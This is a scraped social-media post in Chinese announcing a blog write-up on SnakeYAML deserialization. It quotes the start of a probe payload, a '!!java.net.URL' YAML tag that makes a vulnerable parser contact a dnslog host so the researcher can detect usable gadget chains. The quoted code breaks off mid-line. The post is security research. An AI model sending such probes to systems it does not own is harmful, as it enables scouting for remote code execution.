Lazytom@Y4tacker今天在学习SnakeYAML的反序列化的时候,想到一个新的探测payload,之后又将此拓展成能探测Gadget的链子,不过需要出网,详情可以看看新博客:Translate Tweety4tacker.github.ioSnakeYAML实现Gadget探测SnakeYAML实现Gadget探测@Y4tacker 思路来源今天在学习SnakeYAML的反序列化的时候,想到一个新的探测payload,网上之前有一个SPI那个链子可以有通过URLClassloader检测 1String poc = "!!java.net.URL [null, \"[http://osrwbf.dnslog.cn](http://osrwbf.d3:30 PM · Feb 8, 2022·Twitter Web App2 Retweets25 Likes
